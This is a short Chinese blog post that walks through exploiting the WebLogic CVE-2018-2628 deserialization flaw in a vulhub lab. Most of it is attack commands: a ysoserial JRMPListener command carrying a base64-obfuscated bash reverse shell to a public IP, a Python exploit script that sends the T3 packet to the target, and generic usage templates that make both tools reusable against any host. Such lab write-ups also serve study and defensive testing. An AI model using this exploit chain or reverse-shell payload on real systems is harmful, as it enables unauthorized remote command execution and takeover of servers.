Weblogic WLS Core Components 反序列化命令執行漏洞(CVE-2018-2628)
復現環境:
vulhub
漏洞原因:
Weblogic Server WLS Core Components中出現的一個反序列化漏洞(CVE-2018-2628),該漏洞通過t3協議觸發,可導致未授權的用戶在遠程服務器執行任意命令,
復現程序:
啟動一個執行反彈shell的一個JRMP Server:
payload:
java -cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 4456 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuNDEuNTUuNjAvMTc3MjcgMD4mMQ==}|{base64,-d}|{bash,-i}'
使用expdb的腳本,向目標Weblogic發送資料包:
payload:
python weblogicUnserizlize.py 192.168.43.250 7001 ysoserial-master-8eb5cbfbf6-1.jar 192.168.43.250 4456 JRMPClient
shell反彈成功:
補充:
jar用法:java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
py用法:python exploit.py [目標 ip] [目標 port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/347063.html
標籤:其他
上一篇:Linux中磁盤磁區清理方法